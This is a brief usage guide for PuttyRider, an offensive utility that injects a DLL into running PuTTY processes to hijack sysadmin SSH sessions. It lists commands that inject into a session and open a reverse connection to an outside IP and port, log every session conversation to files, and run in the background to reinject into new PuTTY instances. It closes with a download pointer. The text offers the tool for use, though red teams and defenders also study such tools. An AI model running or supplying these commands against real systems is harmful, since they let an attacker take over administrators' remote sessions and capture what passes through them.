Puttyrider targets sysadmin tool putty.  This tiny utility hijacks putty sessions and injects code in open sessions.

Usage;

List existing Putty processes and their status (injected / not injected)

PuttyRider.exe -l

Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.

PuttyRider.exe -p 0 -r 192.168.0.55:8080

Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.

PuttyRider.exe -w -f

Eject PuttyRider.dll from all Putty processes where it is already injected. (Don’t forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)

PuttyRider.exe -x

Download, code, details here